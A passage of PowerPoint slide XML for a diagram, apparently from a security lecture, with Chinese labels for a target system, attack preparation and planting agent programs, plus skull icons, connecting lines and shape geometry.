              <a:rPr kumimoji="0" lang="zh-CN" altLang="de-DE" sz="1600" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>目标系统</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389131" name="PPBand276"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="2209800"/>
            <a:ext cx="1752600" cy="396875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="de-DE" sz="2000" b="1">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>攻击准备</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="de-DE" altLang="zh-CN" sz="2000" b="1">
              <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1037" name="Picture 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7848600" y="3429000"/>
            <a:ext cx="381000" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="389133" name="Picture 13" descr="skullt"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11" cstate="print">
            <a:lum bright="40000" contrast="40000"/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267200" y="2057400"/>
            <a:ext cx="457200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="389134" name="Picture 14" descr="skullt"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11" cstate="print">
            <a:lum bright="40000" contrast="40000"/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="2743200"/>
            <a:ext cx="457200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="389135" name="Picture 15" descr="skullt"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11" cstate="print">
            <a:lum bright="40000" contrast="40000"/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="3962400"/>
            <a:ext cx="457200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="389136" name="Picture 16" descr="skullt"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11" cstate="print">
            <a:lum bright="40000" contrast="40000"/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267200" y="4724400"/>
            <a:ext cx="457200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389137" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1371600" y="2743200"/>
            <a:ext cx="2743200" cy="1143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38" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="3886200"/>
            <a:ext cx="37338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39" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="3886200"/>
            <a:ext cx="20574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0" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="3886200"/>
            <a:ext cx="2743200" cy="1143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1" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1447800" y="3124200"/>
            <a:ext cx="3657600" cy="762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2" name="PPBand277"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-1327687">
            <a:off x="2438400" y="2819400"/>
            <a:ext cx="1219200" cy="336550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="de-DE" sz="1600">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>安置代理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389143" name="PPBand278"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="2057400"/>
            <a:ext cx="1905000" cy="336550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="de-DE" sz="1600" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>代理程序</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="389144" name="Picture 24" descr="pe01696_"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="3124200"/>
            <a:ext cx="1371600" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 25"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3657600" y="3505200"/>
            <a:ext cx="762000" cy="685800"/>
            <a:chOff x="432" y="2835"/>
            <a:chExt cx="1238" cy="1123"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1053" name="Freeform 26"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="619" y="2844"/>
              <a:ext cx="132" cy="106"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 397"/>
                <a:gd name="T1" fmla="*/ 0 h 318"/>
                <a:gd name="T2" fmla="*/ 1 w 397"/>
                <a:gd name="T3" fmla="*/ 0 h 318"/>
                <a:gd name="T4" fmla="*/ 0 w 397"/>
                <a:gd name="T5" fmla="*/ 1 h 318"/>
                <a:gd name="T6" fmla="*/ 0 w 397"/>
                <a:gd name="T7" fmla="*/ 1 h 318"/>
                <a:gd name="T8" fmla="*/ 1 w 397"/>
                <a:gd name="T9" fmla="*/ 1 h 318"/>
                <a:gd name="T10" fmla="*/ 1 w 397"/>
                <a:gd name="T11" fmla="*/ 1 h 318"/>
                <a:gd name="T12" fmla="*/ 1 w 397"/>
                <a:gd name="T13" fmla="*/ 1 h 318"/>
                <a:gd name="T14" fmla="*/ 1 w 397"/>
                <a:gd name="T15" fmla="*/ 1 h 318"/>
                <a:gd name="T16" fmla="*/ 0 w 397"/>
                <a:gd name="T17" fmla="*/ 1 h 318"/>
                <a:gd name="T18" fmla="*/ 0 w 397"/>
                <a:gd name="T19" fmla="*/ 0 h 318"/>
                <a:gd name="T20" fmla="*/ 1 w 397"/>
                <a:gd name="T21" fmla="*/ 0 h 318"/>
                <a:gd name="T22" fmla="*/ 1 w 397"/>
                <a:gd name="T23" fmla="*/ 0 h 318"/>
                <a:gd name="T24" fmla="*/ 2 w 397"/>
                <a:gd name="T25" fmla="*/ 0 h 318"/>
                <a:gd name="T26" fmla="*/ 1 w 397"/>
                <a:gd name="T27" fmla="*/ 1 h 318"/>
                <a:gd name="T28" fmla="*/ 1 w 397"/>
                <a:gd name="T29" fmla="*/ 0 h 318"/>
                <a:gd name="T30" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1054" name="Freeform 27"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="679" y="2857"/>
              <a:ext cx="978" cy="374"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 2934"/>
                <a:gd name="T1" fmla="*/ 0 h 1122"/>
                <a:gd name="T2" fmla="*/ 0 w 2934"/>
                <a:gd name="T3" fmla="*/ 0 h 1122"/>
                <a:gd name="T4" fmla="*/ 0 w 2934"/>
                <a:gd name="T5" fmla="*/ 1 h 1122"/>
                <a:gd name="T6" fmla="*/ 0 w 2934"/>
                <a:gd name="T7" fmla="*/ 1 h 1122"/>
                <a:gd name="T8" fmla="*/ 1 w 2934"/>
                <a:gd name="T9" fmla="*/ 1 h 1122"/>
                <a:gd name="T10" fmla="*/ 2 w 2934"/>
                <a:gd name="T11" fmla="*/ 1 h 1122"/>
                <a:gd name="T12" fmla="*/ 10 w 2934"/>
                <a:gd name="T13" fmla="*/ 2 h 1122"/>
                <a:gd name="T14" fmla="*/ 10 w 2934"/>
                <a:gd name="T15" fmla="*/ 4 h 1122"/>
                <a:gd name="T16" fmla="*/ 11 w 2934"/>
                <a:gd name="T17" fmla="*/ 4 h 1122"/>
                <a:gd name="T18" fmla="*/ 11 w 2934"/>
                <a:gd name="T19" fmla="*/ 4 h 1122"/>
                <a:gd name="T20" fmla="*/ 11 w 2934"/>
                <a:gd name="T21" fmla="*/ 5 h 1122"/>
                <a:gd name="T22" fmla="*/ 12 w 2934"/>
                <a:gd name="T23" fmla="*/ 4 h 1122"/>
                <a:gd name="T24" fmla="*/ 12 w 2934"/>
                <a:gd name="T25" fmla="*/ 3 h 1122"/>
                <a:gd name="T26" fmla="*/ 12 w 2934"/>
                <a:gd name="T27" fmla="*/ 3 h 1122"/>
                <a:gd name="T28" fmla="*/ 11 w 2934"/>
                <a:gd name="T29" fmla="*/ 3 h 1122"/>
                <a:gd name="T30" fmla="*/ 11 w 2934"/>
                <a:gd name="T31" fmla="*/ 2 h 1122"/>
                <a:gd name="T32" fmla="*/ 10 w 2934"/>
                <a:gd name="T33" fmla="*/ 1 h 1122"/>
                <a:gd name="T34" fmla="*/ 9 w 2934"/>
                <a:gd name="T35" fmla="*/ 0 h 1122"/>
                <a:gd name="T36" fmla="*/ 7 w 2934"/>
                <a:gd name="T37" fmla="*/ 0 h 1122"/>
                <a:gd name="T38" fmla="*/ 5 w 2934"/>
                <a:gd name="T39" fmla="*/ 0 h 1122"/>
                <a:gd name="T40" fmla="*/ 2 w 2934"/>
                <a:gd name="T41" fmla="*/ 0 h 1122"/>
                <a:gd name="T42" fmla="*/ 1 w 2934"/>
                <a:gd name="T43" fmla="*/ 0 h 1122"/>
                <a:gd name="T44" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1055" name="Freeform 28"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="713" y="2899"/>
              <a:ext cx="911" cy="326"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 2734"/>
                <a:gd name="T1" fmla="*/ 1 h 978"/>
                <a:gd name="T2" fmla="*/ 0 w 2734"/>
                <a:gd name="T3" fmla="*/ 0 h 978"/>
                <a:gd name="T4" fmla="*/ 0 w 2734"/>
                <a:gd name="T5" fmla="*/ 0 h 978"/>
                <a:gd name="T6" fmla="*/ 1 w 2734"/>
                <a:gd name="T7" fmla="*/ 0 h 978"/>
                <a:gd name="T8" fmla="*/ 2 w 2734"/>
                <a:gd name="T9" fmla="*/ 0 h 978"/>
                <a:gd name="T10" fmla="*/ 3 w 2734"/>
                <a:gd name="T11" fmla="*/ 0 h 978"/>
                <a:gd name="T12" fmla="*/ 6 w 2734"/>
                <a:gd name="T13" fmla="*/ 0 h 978"/>
                <a:gd name="T14" fmla="*/ 9 w 2734"/>
                <a:gd name="T15" fmla="*/ 1 h 978"/>
                <a:gd name="T16" fmla="*/ 9 w 2734"/>
                <a:gd name="T17" fmla="*/ 1 h 978"/>
                <a:gd name="T18" fmla="*/ 10 w 2734"/>
                <a:gd name="T19" fmla="*/ 2 h 978"/>
                <a:gd name="T20" fmla="*/ 10 w 2734"/>
                <a:gd name="T21" fmla="*/ 1 h 978"/>
                <a:gd name="T22" fmla="*/ 11 w 2734"/>
                <a:gd name="T23" fmla="*/ 2 h 978"/>
                <a:gd name="T24" fmla="*/ 11 w 2734"/>
                <a:gd name="T25" fmla="*/ 3 h 978"/>
                <a:gd name="T26" fmla="*/ 11 w 2734"/>
                <a:gd name="T27" fmla="*/ 3 h 978"/>
                <a:gd name="T28" fmla="*/ 11 w 2734"/>
                <a:gd name="T29" fmla="*/ 3 h 978"/>
                <a:gd name="T30" fmla="*/ 11 w 2734"/>
                <a:gd name="T31" fmla="*/ 3 h 978"/>
                <a:gd name="T32" fmla="*/ 11 w 2734"/>
                <a:gd name="T33" fmla="*/ 3 h 978"/>
                <a:gd name="T34" fmla="*/ 11 w 2734"/>
                <a:gd name="T35" fmla="*/ 4 h 978"/>
                <a:gd name="T36" fmla="*/ 11 w 2734"/>
                <a:gd name="T37" fmla="*/ 4 h 978"/>
                <a:gd name="T38" fmla="*/ 11 w 2734"/>
                <a:gd name="T39" fmla="*/ 3 h 978"/>
                <a:gd name="T40" fmla="*/ 10 w 2734"/>
                <a:gd name="T41" fmla="*/ 4 h 978"/>
                <a:gd name="T42" fmla="*/ 10 w 2734"/>
                <a:gd name="T43" fmla="*/ 4 h 978"/>
                <a:gd name="T44" fmla="*/ 9 w 2734"/>
                <a:gd name="T45" fmla="*/ 2 h 978"/>
                <a:gd name="T46" fmla="*/ 3 w 2734"/>
                <a:gd name="T47" fmla="*/ 1 h 978"/>
                <a:gd name="T48" fmla="*/ 0 w 2734"/>
                <a:gd name="T49" fmla="*/ 1 h 978"/>
                <a:gd name="T50" fmla="*/ 0 w 2734"/>
                <a:gd name="T51" fmla="*/ 1 h 978"/>
                <a:gd name="T52" fmla="*/ 0 w 2734"/>
                <a:gd name="T53" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1056" name="Freeform 29"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="624" y="2872"/>
              <a:ext cx="110" cy="79"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 332"/>
                <a:gd name="T1" fmla="*/ 0 h 237"/>
                <a:gd name="T2" fmla="*/ 0 w 332"/>
                <a:gd name="T3" fmla="*/ 0 h 237"/>
                <a:gd name="T4" fmla="*/ 0 w 332"/>
                <a:gd name="T5" fmla="*/ 1 h 237"/>
                <a:gd name="T6" fmla="*/ 0 w 332"/>
                <a:gd name="T7" fmla="*/ 1 h 237"/>
                <a:gd name="T8" fmla="*/ 1 w 332"/>
                <a:gd name="T9" fmla="*/ 1 h 237"/>
                <a:gd name="T10" fmla="*/ 1 w 332"/>
                <a:gd name="T11" fmla="*/ 1 h 237"/>
                <a:gd name="T12" fmla="*/ 1 w 332"/>
                <a:gd name="T13" fmla="*/ 0 h 237"/>
                <a:gd name="T14" fmla="*/ 1 w 332"/>
                <a:gd name="T15" fmla="*/ 0 h 237"/>
                <a:gd name="T16" fmla="*/ 1 w 332"/>
                <a:gd name="T17" fmla="*/ 0 h 237"/>
                <a:gd name="T18" fmla="*/ 1 w 332"/>
                <a:gd name="T19" fmla="*/ 0 h 237"/>
                <a:gd name="T20" fmla="*/ 1 w 332"/>
                <a:gd name="T21" fmla="*/ 0 h 237"/>
                <a:gd name="T22" fmla="*/ 1 w 332"/>
                <a:gd name="T23" fmla="*/ 0 h 237"/>
                <a:gd name="T24" fmla="*/ 1 w 332"/>
                <a:gd name="T25" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1057" name="Freeform 30"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="489" y="2951"/>
              <a:ext cx="1066" cy="996"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 3199"/>
                <a:gd name="T1" fmla="*/ 1 h 2988"/>
                <a:gd name="T2" fmla="*/ 2 w 3199"/>
                <a:gd name="T3" fmla="*/ 0 h 2988"/>
                <a:gd name="T4" fmla="*/ 5 w 3199"/>
                <a:gd name="T5" fmla="*/ 0 h 2988"/>
                <a:gd name="T6" fmla="*/ 9 w 3199"/>
                <a:gd name="T7" fmla="*/ 0 h 2988"/>
                <a:gd name="T8" fmla="*/ 11 w 3199"/>
                <a:gd name="T9" fmla="*/ 0 h 2988"/>
                <a:gd name="T10" fmla="*/ 12 w 3199"/>
                <a:gd name="T11" fmla="*/ 1 h 2988"/>
                <a:gd name="T12" fmla="*/ 12 w 3199"/>
                <a:gd name="T13" fmla="*/ 4 h 2988"/>
                <a:gd name="T14" fmla="*/ 12 w 3199"/>
                <a:gd name="T15" fmla="*/ 5 h 2988"/>
                <a:gd name="T16" fmla="*/ 13 w 3199"/>
                <a:gd name="T17" fmla="*/ 6 h 2988"/>
                <a:gd name="T18" fmla="*/ 12 w 3199"/>
                <a:gd name="T19" fmla="*/ 9 h 2988"/>
                <a:gd name="T20" fmla="*/ 10 w 3199"/>
                <a:gd name="T21" fmla="*/ 9 h 2988"/>
                <a:gd name="T22" fmla="*/ 11 w 3199"/>
                <a:gd name="T23" fmla="*/ 10 h 2988"/>
                <a:gd name="T24" fmla="*/ 13 w 3199"/>
                <a:gd name="T25" fmla="*/ 10 h 2988"/>
                <a:gd name="T26" fmla="*/ 13 w 3199"/>
                <a:gd name="T27" fmla="*/ 12 h 2988"/>
                <a:gd name="T28" fmla="*/ 1 w 3199"/>
                <a:gd name="T29" fmla="*/ 12 h 2988"/>
                <a:gd name="T30" fmla="*/ 0 w 3199"/>
                <a:gd name="T31" fmla="*/ 11 h 2988"/>
                <a:gd name="T32" fmla="*/ 0 w 3199"/>
                <a:gd name="T33" fmla="*/ 11 h 2988"/>
                <a:gd name="T34" fmla="*/ 2 w 3199"/>
                <a:gd name="T35" fmla="*/ 10 h 2988"/>
                <a:gd name="T36" fmla="*/ 4 w 3199"/>
                <a:gd name="T37" fmla="*/ 10 h 2988"/>
                <a:gd name="T38" fmla="*/ 5 w 3199"/>
                <a:gd name="T39" fmla="*/ 9 h 2988"/>
                <a:gd name="T40" fmla="*/ 5 w 3199"/>
                <a:gd name="T41" fmla="*/ 9 h 2988"/>
                <a:gd name="T42" fmla="*/ 3 w 3199"/>
                <a:gd name="T43" fmla="*/ 8 h 2988"/>
                <a:gd name="T44" fmla="*/ 3 w 3199"/>
                <a:gd name="T45" fmla="*/ 5 h 2988"/>
                <a:gd name="T46" fmla="*/ 2 w 3199"/>
                <a:gd name="T47" fmla="*/ 1 h 2988"/>
                <a:gd name="T48" fmla="*/ 2 w 3199"/>
                <a:gd name="T49" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1058" name="Freeform 31"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="763" y="3008"/>
              <a:ext cx="585" cy="575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1757"/>
                <a:gd name="T1" fmla="*/ 2 h 1724"/>
                <a:gd name="T2" fmla="*/ 1 w 1757"/>
                <a:gd name="T3" fmla="*/ 1 h 1724"/>
                <a:gd name="T4" fmla="*/ 2 w 1757"/>
                <a:gd name="T5" fmla="*/ 0 h 1724"/>
                <a:gd name="T6" fmla="*/ 3 w 1757"/>
                <a:gd name="T7" fmla="*/ 0 h 1724"/>
                <a:gd name="T8" fmla="*/ 4 w 1757"/>
                <a:gd name="T9" fmla="*/ 0 h 1724"/>
                <a:gd name="T10" fmla="*/ 6 w 1757"/>
                <a:gd name="T11" fmla="*/ 0 h 1724"/>
                <a:gd name="T12" fmla="*/ 6 w 1757"/>
                <a:gd name="T13" fmla="*/ 1 h 1724"/>
                <a:gd name="T14" fmla="*/ 7 w 1757"/>
                <a:gd name="T15" fmla="*/ 1 h 1724"/>
                <a:gd name="T16" fmla="*/ 7 w 1757"/>
                <a:gd name="T17" fmla="*/ 2 h 1724"/>
                <a:gd name="T18" fmla="*/ 7 w 1757"/>
                <a:gd name="T19" fmla="*/ 4 h 1724"/>
                <a:gd name="T20" fmla="*/ 7 w 1757"/>
                <a:gd name="T21" fmla="*/ 5 h 1724"/>
                <a:gd name="T22" fmla="*/ 6 w 1757"/>
                <a:gd name="T23" fmla="*/ 6 h 1724"/>
                <a:gd name="T24" fmla="*/ 6 w 1757"/>
                <a:gd name="T25" fmla="*/ 7 h 1724"/>
                <a:gd name="T26" fmla="*/ 5 w 1757"/>
                <a:gd name="T27" fmla="*/ 7 h 1724"/>
                <a:gd name="T28" fmla="*/ 3 w 1757"/>
                <a:gd name="T29" fmla="*/ 7 h 1724"/>
                <a:gd name="T30" fmla="*/ 1 w 1757"/>
                <a:gd name="T31" fmla="*/ 7 h 1724"/>
                <a:gd name="T32" fmla="*/ 0 w 1757"/>
                <a:gd name="T33" fmla="*/ 6 h 1724"/>
                <a:gd name="T34" fmla="*/ 0 w 1757"/>
                <a:gd name="T35" fmla="*/ 5 h 1724"/>
                <a:gd name="T36" fmla="*/ 0 w 1757"/>
                <a:gd name="T37" fmla="*/ 3 h 1724"/>
                <a:gd name="T38" fmla="*/ 0 w 1757"/>
                <a:gd name="T39" fmla="*/ 3 h 1724"/>
                <a:gd name="T40" fmla="*/ 0 w 1757"/>
                <a:gd name="T41" fmla="*/ 2 h 1724"/>
                <a:gd name="T42" fmla="*/ 0 w 1757"/>
                <a:gd name="T43" fmla="*/ 2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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
